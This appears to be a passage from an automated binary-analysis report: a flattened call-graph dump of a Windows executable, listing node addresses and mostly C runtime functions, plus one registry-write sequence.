17810->17813 17811->17807 17811->17809 17813->17807 17814 411790 17813->17814 17817 4115b0 17814->17817 17816 4117a9 17816->17813 17818 4115c6 17817->17818 17819 4115fa 17817->17819 17818->17816 17820 425dbb __time64 GetSystemTimeAsFileTime 17819->17820 17821 411657 _memset 17819->17821 17820->17821 17821->17816 17823 428c14 17822->17823 17824 428c2a EnterCriticalSection 17822->17824 17825 42cd4f __lock 66 API calls 17823->17825 17824->17714 17826 428c1d 17825->17826 17826->17714 17828 42b437 __fflush_nolock 66 API calls 17827->17828 17829 428cb3 17828->17829 17830 42c711 __flsbuf 66 API calls 17829->17830 17832 428cb9 __flsbuf 17830->17832 17831 428d06 17831->17717 17832->17831 17833 42c80d __malloc_crt 66 API calls 17832->17833 17833->17831 17863 425ef9 17834->17863 17837 426de9 17838 426d35 _write_string 66 API calls 17837->17838 17839 426dee 17838->17839 17841 426ce3 __commit 11 API calls 17839->17841 17840 42b437 __fflush_nolock 66 API calls 17847 426e20 __output_l __aulldvrm _strlen 17840->17847 17842 426df9 17841->17842 17843 4256d3 __write_nolock 5 API calls 17842->17843 17844 427905 17843->17844 17844->17719 17846 4258b8 _free 66 API calls 17846->17847 17847->17837 17847->17842 17847->17846 17848 427475 DecodePointer 17847->17848 17849 42c80d __malloc_crt 66 API calls 17847->17849 17850 4274de DecodePointer 17847->17850 17851 4274ff DecodePointer 17847->17851 17852 42795d 97 API calls _write_string 17847->17852 17853 42cad0 78 API calls __cftof 17847->17853 17854 42792a 97 API calls _write_string 17847->17854 17871 42caed 17847->17871 17848->17847 17849->17847 17850->17847 17851->17847 17852->17847 17853->17847 17854->17847 17856 425a02 17855->17856 17857 428d4b 17855->17857 17859 425a1a 17856->17859 17857->17856 18179 42b5ee 17857->18179 17860 425a1f __flsbuf 17859->17860 18185 428c75 17860->18185 17862 425a2a 17862->17715 17864 425f0c 17863->17864 17868 425f59 17863->17868 17865 42a905 __getptd 66 API calls 17864->17865 17866 425f11 17865->17866 17867 425f39 17866->17867 17874 42a6dc 17866->17874 17867->17868 17889 429f5b 17867->17889 17868->17837 17868->17840 17868->17847 17872 425ef9 _LocaleUpdate::_LocaleUpdate 76 API calls 17871->17872 17873 42cb00 17872->17873 17873->17847 17875 42a6e8 __commit 17874->17875 17876 42a905 __getptd 66 API calls 17875->17876 17877 42a6ed 17876->17877 17878 42a71b 17877->17878 17880 42a6ff 17877->17880 17879 42cd4f __lock 66 API calls 17878->17879 17881 42a722 17879->17881 17882 42a905 __getptd 66 API calls 17880->17882 17905 42a68f 17881->17905 17886 42a704 17882->17886 17887 42888c __amsg_exit 66 API calls 17886->17887 17888 42a712 __commit 17886->17888 17887->17888 17888->17867 17890 429f67 __commit 17889->17890 17891 42a905 __getptd 66 API calls 17890->17891 17892 429f6c 17891->17892 17893 42cd4f __lock 66 API calls 17892->17893 17902 429f7e 17892->17902 17894 429f9c 17893->17894 17895 429fe5 17894->17895 17897 429fb3 InterlockedDecrement 17894->17897 17898 429fcd InterlockedIncrement 17894->17898 18175 429ff6 17895->18175 17896 429f8c __commit 17896->17868 17897->17898 17901 429fbe 17897->17901 17898->17895 17900 42888c __amsg_exit 66 API calls 17900->17896 17901->17898 17903 4258b8 _free 66 API calls 17901->17903 17902->17896 17902->17900 17904 429fcc 17903->17904 17904->17898 17906 42a6d1 17905->17906 17907 42a69c 17905->17907 17913 42a749 17906->17913 17907->17906 17908 42a41c ___addlocaleref 8 API calls 17907->17908 17909 42a6b2 17908->17909 17909->17906 17916 42a4ab 17909->17916 18174 42cc76 LeaveCriticalSection 17913->18174 17915 42a750 17915->17886 17917 42a53f 17916->17917 17918 42a4bc InterlockedDecrement 17916->17918 17917->17906 17930 42a544 17917->17930 17919 42a4d1 InterlockedDecrement 17918->17919 17920 42a4d4 17918->17920 17919->17920 17921 42a4e1 17920->17921 17922 42a4de InterlockedDecrement 17920->17922 17923 42a4eb InterlockedDecrement 17921->17923 17924 42a4ee 17921->17924 17922->17921 17923->17924 17925 42a4f8 InterlockedDecrement 17924->17925 17927 42a4fb 17924->17927 17925->17927 17926 42a514 InterlockedDecrement 17926->17927 17927->17926 17928 42a524 InterlockedDecrement 17927->17928 17929 42a52f InterlockedDecrement 17927->17929 17928->17927 17929->17917 17931 42a5c8 17930->17931 17939 42a55b 17930->17939 17932 42a615 17931->17932 17933 4258b8 _free 66 API calls 17931->17933 17941 42a63e 17932->17941 18000 42dace 17932->18000 17934 42a5e9 17933->17934 17936 4258b8 _free 66 API calls 17934->17936 17942 42a5fc 17936->17942 17937 42a5b0 17943 4258b8 _free 66 API calls 17937->17943 17938 42a58f 17938->17937 17948 4258b8 _free 66 API calls 17938->17948 17939->17931 17939->17938 17945 4258b8 _free 66 API calls 17939->17945 17944 42a683 17941->17944 17954 4258b8 66 API calls _free 17941->17954 17947 4258b8 _free 66 API calls 17942->17947 17949 42a5bd 17943->17949 17950 4258b8 _free 66 API calls 17944->17950 17951 42a584 17945->17951 17946 4258b8 _free 66 API calls 17946->17941 17952 42a60a 17947->17952 17953 42a5a5 17948->17953 17955 4258b8 _free 66 API calls 17949->17955 17956 42a689 17950->17956 17960 42deae 17951->17960 17958 4258b8 _free 66 API calls 17952->17958 17988 42de45 17953->17988 17954->17941 17955->17931 17956->17906 17958->17932 17961 42debf 17960->17961 17987 42dfa8 17960->17987 17962 42ded0 17961->17962 17963 4258b8 _free 66 API calls 17961->17963 17964 42dee2 17962->17964 17965 4258b8 _free 66 API calls 17962->17965 17963->17962 17966 42def4 17964->17966 17967 4258b8 _free 66 API calls 17964->17967 17965->17964 17968 42df06 17966->17968 17970 4258b8 _free 66 API calls 17966->17970 17967->17966 17969 42df18 17968->17969 17971 4258b8 _free 66 API calls 17968->17971 17972 42df2a 17969->17972 17973 4258b8 _free 66 API calls 17969->17973 17970->17968 17971->17969 17974 42df3c 17972->17974 17975 4258b8 _free 66 API calls 17972->17975 17973->17972 17976 4258b8 _free 66 API calls 17974->17976 17979 42df4e 17974->17979 17975->17974 17976->17979 17977 4258b8 _free 66 API calls 17978 42df60 17977->17978 17980 4258b8 _free 66 API calls 17978->17980 17982 42df72 17978->17982 17979->17977 17979->17978 17980->17982 17981 42df84 17984 42df96 17981->17984 17985 4258b8 _free 66 API calls 17981->17985 17982->17981 17983 4258b8 _free 66 API calls 17982->17983 17983->17981 17986 4258b8 _free 66 API calls 17984->17986 17984->17987 17985->17984 17986->17987 17987->17938 17989 42de52 17988->17989 17990 42deaa 17988->17990 17991 42de62 17989->17991 17993 4258b8 _free 66 API calls 17989->17993 17990->17937 17992 42de74 17991->17992 17994 4258b8 _free 66 API calls 17991->17994 17995 42de86 17992->17995 17996 4258b8 _free 66 API calls 17992->17996 17993->17991 17994->17992 17997 42de98 17995->17997 17998 4258b8 _free 66 API calls 17995->17998 17996->17995 17997->17990 17999 4258b8 _free 66 API calls 17997->17999 17998->17997 17999->17990 18001 42a633 18000->18001 18002 42dadf 18000->18002 18001->17946 18003 4258b8 _free 66 API calls 18002->18003 18004 42dae7 18003->18004 18005 4258b8 _free 66 API calls 18004->18005 18006 42daef 18005->18006 18007 4258b8 _free 66 API calls 18006->18007 18008 42daf7 18007->18008 18009 4258b8 _free 66 API calls 18008->18009 18010 42daff 18009->18010 18011 4258b8 _free 66 API calls 18010->18011 18012 42db07 18011->18012 18013 4258b8 _free 66 API calls 18012->18013 18014 42db0f 18013->18014 18015 4258b8 _free 66 API calls 18014->18015 18016 42db16 18015->18016 18017 4258b8 _free 66 API calls 18016->18017 18018 42db1e 18017->18018 18019 4258b8 _free 66 API calls 18018->18019 18020 42db26 18019->18020 18021 4258b8 _free 66 API calls 18020->18021 18022 42db2e 18021->18022 18023 4258b8 _free 66 API calls 18022->18023 18024 42db36 18023->18024 18025 4258b8 _free 66 API calls 18024->18025 18026 42db3e 18025->18026 18027 4258b8 _free 66 API calls 18026->18027 18028 42db46 18027->18028 18029 4258b8 _free 66 API calls 18028->18029 18030 42db4e 18029->18030 18031 4258b8 _free 66 API calls 18030->18031 18032 42db56 18031->18032 18033 4258b8 _free 66 API calls 18032->18033 18034 42db5e 18033->18034 18035 4258b8 _free 66 API calls 18034->18035 18036 42db69 18035->18036 18037 4258b8 _free 66 API calls 18036->18037 18038 42db71 18037->18038 18039 4258b8 _free 66 API calls 18038->18039 18040 42db79 18039->18040 18041 4258b8 _free 66 API calls 18040->18041 18042 42db81 18041->18042 18043 4258b8 _free 66 API calls 18042->18043 18044 42db89 18043->18044 18045 4258b8 _free 66 API calls 18044->18045 18046 42db91 18045->18046 18047 4258b8 _free 66 API calls 18046->18047 18048 42db99 18047->18048 18049 4258b8 _free 66 API calls 18048->18049 18050 42dba1 18049->18050 18051 4258b8 _free 66 API calls 18050->18051 18052 42dba9 18051->18052 18053 4258b8 _free 66 API calls 18052->18053 18054 42dbb1 18053->18054 18055 4258b8 _free 66 API calls 18054->18055 18056 42dbb9 18055->18056 18057 4258b8 _free 66 API calls 18056->18057 18058 42dbc1 18057->18058 18059 4258b8 _free 66 API calls 18058->18059 18060 42dbc9 18059->18060 18061 4258b8 _free 66 API calls 18060->18061 18174->17915 18178 42cc76 LeaveCriticalSection 18175->18178 18177 429ffd 18177->17902 18178->18177 18180 42b629 18179->18180 18181 42b607 18179->18181 18180->17856 18181->18180 18182 42b437 __fflush_nolock 66 API calls 18181->18182 18183 42b622 18182->18183 18184 42c5f4 __write 97 API calls 18183->18184 18184->18180 18186 428c85 18185->18186 18187 428c98 LeaveCriticalSection 18185->18187 18190 42cc76 LeaveCriticalSection 18186->18190 18187->17862 18189 428c95 18189->17862 18190->18189 18192 425cfd __strftime_l 97 API calls 18191->18192 18193 401049 RegCreateKeyExW RegSetValueExW RegFlushKey RegCloseKey 18192->18193 18193->17352 18195 4147f9 18194->18195 18202 41483c 18194->18202 18195->18202 18216 414c30 18195->18216 18196 4256d3 __write_nolock 5 API calls 18198 4148de 18196->18198 18198->17357 18199 414807 18200 414bd0 2 API calls 18199->18200 18199->18202 18201 41481f 18200->18201 18201->18202 18203 41b240 _aullshr 18201->18203 18202->18196 18204 41485e 18203->18204 18205 4258f2 _malloc 66 API calls 18204->18205 18206 414870 _memset 18205->18206 18207 41b240 _aullshr 18206->18207 18208 41489b 18207->18208 18210 41bf80 5 API calls 18208->18210 18212 4148a9 18208->18212 18209 4258b8 _free 66 API calls 18209->18202 18211 41493c 18210->18211 18211->18212 18213 414947 18211->18213 18212->18209 18214 4256d3 __write_nolock 5 API calls 18213->18214 18215 414956 18214->18215 18215->17357 18217 414c3e 18216->18217 18218 418cd0 _aullshr 18217->18218 18219 414ca0 18217->18219 18218->18219 18219->18199 18221 4128c8 18220->18221 18222 4128c3 18220->18222 18221->17102 18222->18221 18233 4127a0 18222->18233 18224 412906 18224->18221 18238 4125e0 18224->18238 18226 412919 18248 4132f0 18226->18248 18231 4132f0 6 API calls 18232 412971 18231->18232 18232->17102 18234 4127b8 18233->18234 18236 4127b3 18233->18236 18234->18224 18236->18234 18263 4131d0 18236->18263 18237 4127f3 18237->18224 18239 412602 18238->18239 18240 4125fd 18238->18240 18241 4256d3 __write_nolock 5 API calls 18239->18241 18240->18239 18243 412615 18240->18243 18242 412611 18241->18242 18242->18226 18244 4131d0 6 API calls 18243->18244 18247 412637 18243->18247 18244->18247 18245 4256d3 __write_nolock 5 API calls 18246 412795 18245->18246 18246->18226 18247->18245 18249 4132fa 18248->18249 18251 41295e 18248->18251 18250 412fc0 6 API calls 18249->18250 18249->18251 18252 41331f 18250->18252 18254 412980 18251->18254 18252->18251 18253 412fc0 6 API calls 18252->18253 18253->18251 18270 412a00 18254->18270 18256 412996 18257 412fc0 6 API calls 18256->18257 18262 41296b 18256->18262 18258 4129af 18257->18258 18259 412fc0 6 API calls 18258->18259 18260 4129d8 18259->18260 18261 412fc0 6 API calls 18260->18261 18261->18262 18262->18231 18264 4131e7 18263->18264 18265 4131de 18263->18265 18266 412fc0 6 API calls 18264->18266 18265->18237 18267 4131f6 18266->18267 18268 412fc0 6 API calls 18267->18268 18269 41320e 18267->18269 18268->18269 18269->18237 18271 412a35 18270->18271 18272 412af1 18270->18272 18271->18272 18275 412fc0 6 API calls 18271->18275 18273 4256d3 __write_nolock 5 API calls 18272->18273 18274 412b0e 18273->18274 18274->18256 18276 412a4c 18275->18276 18276->18272 18277 412fc0 6 API calls 18276->18277 18278 412aca 18277->18278 18279 412b12 18278->18279 18280 412ae2 18278->18280 18281 412fc0 6 API calls 18279->18281 18282 412fc0 6 API calls 18280->18282 18283 412b24 18281->18283 18282->18272 18284 412fc0 6 API calls 18283->18284 18285 412b4f 18284->18285 18286 412fc0 6 API calls 18285->18286 18287 412b7a 18286->18287 18288 412ba7 18287->18288 18294 412bd0 18287->18294 18290 4256d3 __write_nolock 5 API calls 18288->18290 18292 412bc5 18290->18292 18292->18256 18295 412fc0 6 API calls 18294->18295 18296 412b9c 18295->18296 18297 412bf0 18296->18297 18298 412fc0 6 API calls 18297->18298 18299 412c01 18298->18299 18299->18288 18301 426389 __commit 18300->18301 18302 42639c 18301->18302 18305 4263ca 18301->18305 18303 426d35 _write_string 66 API calls 18302->18303 18304 4263a1 18303->18304 18306 426ce3 __commit 11 API calls 18304->18306 18319 42af60 18305->18319 18315 4263ac __commit @_EH4_CallFilterFunc@8 18306->18315 18308 4263cf 18309 4263e3 18308->18309 18310 4263d6 18308->18310 18312 42640b 18309->18312 18313 4263eb 18309->18313 18311 426d35 _write_string 66 API calls 18310->18311 18311->18315 18336 42aca7 18312->18336 18316 426d35 _write_string 66 API calls 18313->18316 18315->17144 18316->18315 18320 42af6c __commit 18319->18320 18321 42cd4f __lock 66 API calls 18320->18321 18329 42af7a 18321->18329 18322 42afef 18361 42b08a 18322->18361 18323 42aff6 18324 42c80d __malloc_crt 66 API calls 18323->18324 18326 42affd 18324->18326 18326->18322 18328 42b00b InitializeCriticalSectionAndSpinCount 18326->18328 18327 42b07f __commit 18327->18308 18330 42b02b 18328->18330 18331 42b03e EnterCriticalSection 18328->18331 18329->18322 18329->18323 18332 42cc8d __mtinitlocknum 66 API calls 18329->18332 18333 428c07 __getstream 67 API calls 18329->18333 18335 428c75 __getstream 2 API calls 18329->18335 18334 4258b8 _free 66 API calls 18330->18334 18331->18322 18332->18329 18333->18329 18334->18322 18335->18329 18337 42acc9 18336->18337 18338 42ace4 18337->18338 18349 42acfb 18337->18349 18340 426d35 _write_string 66 API calls 18338->18340 18339 42aeb0 18343 42af1b 18339->18343 18344 42af09 18339->18344 18341 42ace9 18340->18341 18342 426ce3 __commit 11 API calls 18341->18342 18348 426416 18342->18348 18373 42ec5b 18343->18373 18345 426d35 _write_string 66 API calls 18344->18345 18347 42af0e 18345->18347 18351 426ce3 __commit 11 API calls 18347->18351 18358 426431 18348->18358 18349->18339 18349->18344 18350 42ae69 wcsncmp 18349->18350 18350->18344 18352 42ae81 18350->18352 18351->18348 18352->18344 18352->18352 18365 42ed60 18352->18365 18355 42ed60 __wcsnicmp 78 API calls 18356 42aec8 18355->18356 18356->18339 18357 42ed60 __wcsnicmp 78 API calls 18356->18357 18357->18339 18691 428c39 18358->18691 18360 426439 18360->18315 18364 42cc76 LeaveCriticalSection 18361->18364 18363 42b091 18363->18327 18364->18363 18366 42ede8 18365->18366 18367 42ed6f 18365->18367 18376 42ec7b 18366->18376 18369 426d35 _write_string 66 API calls 18367->18369 18371 42aea9 18367->18371 18370 42ed86 18369->18370 18372 426ce3 __commit 11 API calls 18370->18372 18371->18339 18371->18355 18372->18371 18387 42eb97 18373->18387 18375 42ec76 18375->18348 18377 42ec90 18376->18377 18384 42eca7 18376->18384 18378 42ec97 18377->18378 18380 42ecb8 18377->18380 18379 426d35 _write_string 66 API calls 18378->18379 18381 42ec9c 18379->18381 18382 425ef9 _LocaleUpdate::_LocaleUpdate 76 API calls 18380->18382 18383 426ce3 __commit 11 API calls 18381->18383 18386 42ecc4 18382->18386 18383->18384 18384->18371 18385 4300f0 78 API calls __towlower_l 18385->18386 18386->18384 18386->18385 18389 42eba3 __commit 18387->18389 18388 42ebb6 18390 426d35 _write_string 66 API calls 18388->18390 18389->18388 18391 42ebec 18389->18391 18392 42ebbb 18390->18392 18398 42e462 18391->18398 18393 426ce3 __commit 11 API calls 18392->18393 18397 42ebc5 __commit 18393->18397 18395 42ec06 18497 42ec2d 18395->18497 18397->18375 18399 42e489 18398->18399 18501 4300c3 18399->18501 18401 426c91 __invoke_watson 10 API calls 18402 42eb96 __commit 18401->18402 18407 42ebb6 18402->18407 18412 42ebec 18402->18412 18403 42e4e4 18405 426d48 __set_osfhnd 66 API calls 18403->18405 18404 42e4a5 18404->18403 18411 42e53f 18404->18411 18469 42e714 18404->18469 18406 42e4e9 18405->18406 18408 426d35 _write_string 66 API calls 18406->18408 18409 426d35 _write_string 66 API calls 18407->18409 18410 42e4f3 18408->18410 18413 42ebbb 18409->18413 18416 426ce3 __commit 11 API calls 18410->18416 18415 42e5c6 18411->18415 18424 42e599 18411->18424 18417 42e462 __tsopen_nolock 120 API calls 18412->18417 18414 426ce3 __commit 11 API calls 18413->18414 18423 42ebc5 __commit 18414->18423 18418 426d48 __set_osfhnd 66 API calls 18415->18418 18428 42e4fd 18416->18428 18419 42ec06 18417->18419 18420 42e5cb 18418->18420 18421 42ec2d __wsopen_helper LeaveCriticalSection 18419->18421 18422 426d35 _write_string 66 API calls 18420->18422 18421->18423 18425 42e5d5 18422->18425 18423->18395 18508 42f16d 18424->18508 18426 426ce3 __commit 11 API calls 18425->18426 18426->18428 18428->18395 18429 42e657 18430 42e660 18429->18430 18431 42e681 CreateFileW 18429->18431 18434 426d48 __set_osfhnd 66 API calls 18430->18434 18432 42e71e GetFileType 18431->18432 18469->18401 18498 42ec32 18497->18498 18500 42ec59 18497->18500 18500->18397 18502 4300e4 18501->18502 18503 4300cf 18501->18503 18502->18404 18504 426d35 _write_string 66 API calls 18503->18504 18505 4300d4 18504->18505 18506 426ce3 __commit 11 API calls 18505->18506 18507 4300df 18506->18507 18507->18404 18509 42f179 __commit 18508->18509 18510 42cc8d __mtinitlocknum 66 API calls 18509->18510 18511 42f189 18510->18511 18512 42cd4f __lock 66 API calls 18511->18512 18513 42f18e __commit 18511->18513 18523 42f19d 18512->18523 18513->18429 18514 42f2df 18672 42f2fd 18514->18672 18516 42f275 18517 42c852 __calloc_crt 66 API calls 18516->18517 18518 42f21d EnterCriticalSection 18521 42f22d LeaveCriticalSection 18518->18521 18518->18523 18519 42cd4f __lock 66 API calls 18519->18523 18521->18523 18522 42f1f3 InitializeCriticalSectionAndSpinCount 18522->18523 18523->18514 18523->18516 18523->18518 18523->18519 18523->18522 18669 42f23f 18523->18669 18675 42cc76 LeaveCriticalSection 18669->18675 18692 428c4a 18691->18692 18693 428c69 LeaveCriticalSection 18691->18693 18692->18693 18694 428c51 18692->18694 18693->18360 18697 42cc76 LeaveCriticalSection 18694->18697 18696 428c66 18696->18360 18697->18696 18699 428bfa EnterCriticalSection 18698->18699 18700 428bd8 18698->18700 18702 4264ce 18699->18702 18700->18699 18701 428be0 18700->18701 18703 42cd4f __lock 66 API calls 18701->18703 18702->17155 18702->17168 18703->18702 18705 428c39 _fprintf 2 API calls 18704->18705 18706 42658c 18705->18706 18706->17158 18708 4265b3 18707->18708 18709 42659f 18707->18709 18711 42b5ee __flush 97 API calls 18708->18711 18716 4265af 18708->18716 18710 426d35 _write_string 66 API calls 18709->18710 18712 4265a4 18710->18712 18713 4265bf 18711->18713 18714 426ce3 __commit 11 API calls 18712->18714 18726 42b5bd 18713->18726 18714->18716 18723 426667 18716->18723 18718 42b437 __fflush_nolock 66 API calls 18719 4265cd 18718->18719 18730 42b4f9 18719->18730 18721 4265d3 18721->18716 18722 4258b8 _free 66 API calls 18721->18722 18722->18716 18724 428c39 _fprintf 2 API calls 18723->18724 18725 42666d 18724->18725 18725->17180 18727 4265c7 18726->18727 18728 42b5cd 18726->18728 18727->18718 18728->18727 18729 4258b8 _free 66 API calls 18728->18729 18729->18727 18731 42b505 __commit 18730->18731 18732 42b528 18731->18732 18733 42b50d 18731->18733 18734 42b534 18732->18734 18740 42b56e 18732->18740 18735 426d48 __set_osfhnd 66 API calls 18733->18735 18736 426d48 __set_osfhnd 66 API calls 18734->18736 18737 42b512 18735->18737 18739 42b539 18736->18739 18738 426d35 _write_string 66 API calls 18737->18738 18750 42b51a __commit 18738->18750 18741 426d35 _write_string 66 API calls 18739->18741 18742 42f0a7 ___lock_fhandle 68 API calls 18740->18742 18743 42b541 18741->18743 18744 42b574 18742->18744 18747 426ce3 __commit 11 API calls 18743->18747 18745 42b582 18744->18745 18746 42b58e 18744->18746 18748 42b45d __close_nolock 69 API calls 18745->18748 18749 426d35 _write_string 66 API calls 18746->18749 18747->18750 18751 42b588 18748->18751 18749->18751 18750->18721 18753 42b5b5 18751->18753 18756 42f146 LeaveCriticalSection 18753->18756 18755 42b5bb 18755->18750 18756->18755 18757->17191 18769 42870e __commit 18768->18769 18770 42cd4f __lock 61 API calls 18769->18770 18771 428715 18770->18771 18773 428740 RtlDecodePointer 18771->18773 18777 4287bf 18771->18777 18774 428757 DecodePointer 18773->18774 18773->18777 18783 42876a 18774->18783 18776 42883c __commit 18776->16574 18789 42882d 18777->18789 18780 428824 18781 42882d 18780->18781 18782 4285ea __mtinitlocknum 3 API calls 18780->18782 18787 42883a 18781->18787 18796 42cc76 LeaveCriticalSection 18781->18796 18782->18781 18783->18777 18784 428781 DecodePointer 18783->18784 18788 428790 DecodePointer DecodePointer 18783->18788 18794 42a755 RtlEncodePointer 18783->18794 18795 42a755 RtlEncodePointer 18784->18795 18787->16574 18788->18783 18790 428833 18789->18790 18791 42880d 18789->18791 18797 42cc76 LeaveCriticalSection 18790->18797 18791->18776 18793 42cc76 LeaveCriticalSection 18791->18793 18793->18780 18794->18783 18795->18783 18796->18787 18797->18791 18799 428702 _doexit 66 API calls 18798->18799 18800 428869 18799->18800 19787 42a3ff 19790 42a264 19787->19790 19789 42a40e 19791 42a270 __commit 19790->19791 19792 42a905 __getptd 66 API calls 19791->19792 19793 42a279 19792->19793 19794 429f5b _LocaleUpdate::_LocaleUpdate 68 API calls 19793->19794 19795 42a283 19794->19795 19821 429fff 19795->19821 19798 42c80d __malloc_crt 66 API calls 19799 42a2a4 19798->19799 19800 42a3c3 __commit 19799->19800 19828 42a07b 19799->19828 19800->19789 19803 42a3d0 19803->19800 19808 42a3e3 19803->19808 19810 4258b8 _free 66 API calls 19803->19810 19804 42a2d4 InterlockedDecrement 19805 42a2e4 19804->19805 19806 42a2f5 InterlockedIncrement 19804->19806 19805->19806 19809 4258b8 _free 66 API calls 19805->19809 19806->19800 19807 42a30b 19806->19807 19807->19800 19813 42cd4f __lock 66 API calls 19807->19813 19811 426d35 _write_string 66 API calls 19808->19811 19812 42a2f4 19809->19812 19810->19808 19811->19800 19812->19806 19815 42a31f InterlockedDecrement 19813->19815 19816 42a39b 19815->19816 19817 42a3ae InterlockedIncrement 19815->19817 19816->19817 19819 4258b8 _free 66 API calls 19816->19819 19838 42a3c5 19817->19838 19820 42a3ad 19819->19820 19820->19817 19822 425ef9 _LocaleUpdate::_LocaleUpdate 76 API calls 19821->19822 19823 42a013 19822->19823 19824 42a01e GetOEMCP 19823->19824 19825 42a03c 19823->19825 19827 42a02e 19824->19827 19826 42a041 GetACP 19825->19826 19825->19827 19826->19827 19827->19798 19827->19800 19829 429fff getSystemCP 78 API calls 19828->19829 19830 42a09b 19829->19830 19831 42a0a6 setSBCS 19830->19831 19834 42a10f _memset __setmbcp_nolock 19830->19834 19835 42a0ea IsValidCodePage 19830->19835 19832 4256d3 __write_nolock 5 API calls 19831->19832 19833 42a262 19832->19833 19833->19803 19833->19804 19841 429dcb GetCPInfo 19834->19841 19835->19831 19836 42a0fc GetCPInfo 19835->19836 19836->19831 19836->19834 19898 42cc76 LeaveCriticalSection 19838->19898 19840 42a3cc 19840->19800 19844 429dff _memset 19841->19844 19850 429eb3 19841->19850 19851 42da8e 19844->19851 19846 4256d3 __write_nolock 5 API calls 19848 429f59 19846->19848 19848->19834 19849 42d961 ___crtLCMapStringA 82 API calls 19849->19850 19850->19846 19852 425ef9 _LocaleUpdate::_LocaleUpdate 76 API calls 19851->19852 19853 42daa1 19852->19853 19861 42d9a7 19853->19861 19856 42d961 19857 425ef9 _LocaleUpdate::_LocaleUpdate 76 API calls 19856->19857 19858 42d974 19857->19858 19874 42d77a 19858->19874 19862 42d9d0 MultiByteToWideChar 19861->19862 19863 42d9c5 19861->19863 19864 42d9f9 19862->19864 19866 42d9fd 19862->19866 19863->19862 19865 4256d3 __write_nolock 5 API calls 19864->19865 19867 429e6e 19865->19867 19869 42da12 _wcslwr_s_l_stat _memset 19866->19869 19870 4258f2 _malloc 66 API calls 19866->19870 19867->19856 19868 42da4b MultiByteToWideChar 19871 42da72 19868->19871 19872 42da61 GetStringTypeW 19868->19872 19869->19864 19869->19868 19870->19869 19873 425ed9 __freea 66 API calls 19871->19873 19872->19871 19873->19864 19876 42d798 MultiByteToWideChar 19874->19876 19877 42d7f6 19876->19877 19881 42d7fd 19876->19881 19878 4256d3 __write_nolock 5 API calls 19877->19878 19880 429e8e 19878->19880 19879 42d84a MultiByteToWideChar 19882 42d942 19879->19882 19883 42d863 LCMapStringW 19879->19883 19880->19849 19884 4258f2 _malloc 66 API calls 19881->19884 19888 42d816 _wcslwr_s_l_stat 19881->19888 19885 425ed9 __freea 66 API calls 19882->19885 19883->19882 19886 42d882 19883->19886 19884->19888 19885->19877 19887 42d88c 19886->19887 19891 42d8b5 19886->19891 19887->19882 19889 42d8a0 LCMapStringW 19887->19889 19888->19877 19888->19879 19889->19882 19890 42d904 LCMapStringW 19893 42d91a WideCharToMultiByte 19890->19893 19894 42d93c 19890->19894 19892 4258f2 _malloc 66 API calls 19891->19892 19895 42d8d0 _wcslwr_s_l_stat 19891->19895 19892->19895 19893->19894 19896 425ed9 __freea 66 API calls 19894->19896 19895->19882 19895->19890 19896->19882 19898->19840 19927 425d9a 19930 425d8a 19927->19930 19929 425da7 ctype 19933 429bcb 19930->19933 19932 425d98 19932->19929 19934 429bd7 __commit 19933->19934 19935 42cd4f __lock 66 API calls 19934->19935 19938 429bde 19935->19938 19936 429c17 19943 429c32 19936->19943 19938->19936 19939 429c0e 19938->19939 19942 4258b8 _free 66 API calls 19938->19942 19941 4258b8 _free 66 API calls 19939->19941 19940 429c28 __commit 19940->19932 19941->19936 19942->19939 19946 42cc76 LeaveCriticalSection 19943->19946 19945 429c39 19945->19940 19946->19945 19618 42a91f 19620 42a92b __commit 19618->19620 19619 42a943 19623 4258b8 _free 66 API calls 19619->19623 19626 42a951 19619->19626 19620->19619 19621 42aa2d __commit 19620->19621 19622 4258b8 _free 66 API calls 19620->19622 19622->19619 19623->19626 19624 42a95f 19625 42a96d 19624->19625 19628 4258b8 _free 66 API calls 19624->19628 19629 42a97b 19625->19629 19630 4258b8 _free 66 API calls 19625->19630 19626->19624 19627 4258b8 _free 66 API calls 19626->19627 19627->19624 19628->19625 19631 42a989 19629->19631 19632 4258b8 _free 66 API calls 19629->19632 19630->19629 19633 42a997 19631->19633 19635 4258b8 _free 66 API calls 19631->19635 19632->19631 19634 42a9a8 19633->19634 19636 4258b8 _free 66 API calls 19633->19636 19637 42cd4f __lock 66 API calls 19634->19637 19635->19633 19636->19634 19638 42a9b0 19637->19638 19639 42a9d5 19638->19639 19640 42a9bc InterlockedDecrement 19638->19640 19654 42aa39 19639->19654 19640->19639 19641 42a9c7 19640->19641 19641->19639 19645 4258b8 _free 66 API calls 19641->19645 19644 42cd4f __lock 66 API calls 19646 42a9e9 19644->19646 19645->19639 19647 42aa1a 19646->19647 19648 42a4ab ___removelocaleref 8 API calls 19646->19648 19657 42aa45 19647->19657 19652 42a9fe 19648->19652 19651 4258b8 _free 66 API calls 19651->19621 19652->19647 19653 42a544 ___freetlocinfo 66 API calls 19652->19653 19653->19647 19660 42cc76 LeaveCriticalSection 19654->19660 19656 42a9e2 19656->19644 19661 42cc76 LeaveCriticalSection 19657->19661 19659 42aa27 19659->19651 19660->19656 19661->19659 19951 428ba6 19958 42b778 19951->19958 19954 428bb9 19956 4258b8 _free 66 API calls 19954->19956 19957 428bc4 19956->19957 19971 42b69e 19958->19971 19960 428bab 19960->19954 19961 42d427 19960->19961 19962 42d433 __commit 19961->19962 19963 42cd4f __lock 66 API calls 19962->19963 19964 42d43f 19963->19964 19965 42d4a5 19964->19965 19967 42d47a DeleteCriticalSection 19964->19967 19968 4265fb __fcloseall 102 API calls 19964->19968 19988 42d4ba 19965->19988 19969 4258b8 _free 66 API calls 19967->19969 19968->19964 19969->19964 19970 42d4b1 __commit 19970->19954 19972 42b6aa __commit 19971->19972 19973 42cd4f __lock 66 API calls 19972->19973 19980 42b6b9 19973->19980 19974 42b751 19984 42b76f 19974->19984 19976 428c07 __getstream 67 API calls 19976->19980 19977 42b75d __commit 19977->19960 19979 42b656 101 API calls __fflush_nolock 19979->19980 19980->19974 19980->19976 19980->19979 19981 42b740 19980->19981 19982 428c75 __getstream 2 API calls 19981->19982 19983 42b74e 19982->19983 19983->19980 19987 42cc76 LeaveCriticalSection 19984->19987 19986 42b776 19986->19977 19987->19986 19991 42cc76 LeaveCriticalSection 19988->19991 19990 42d4c1 19990->19970 19991->19990

                    Executed Functions

                    Control-flow Graph

                    • Executed
                    • Not Executed
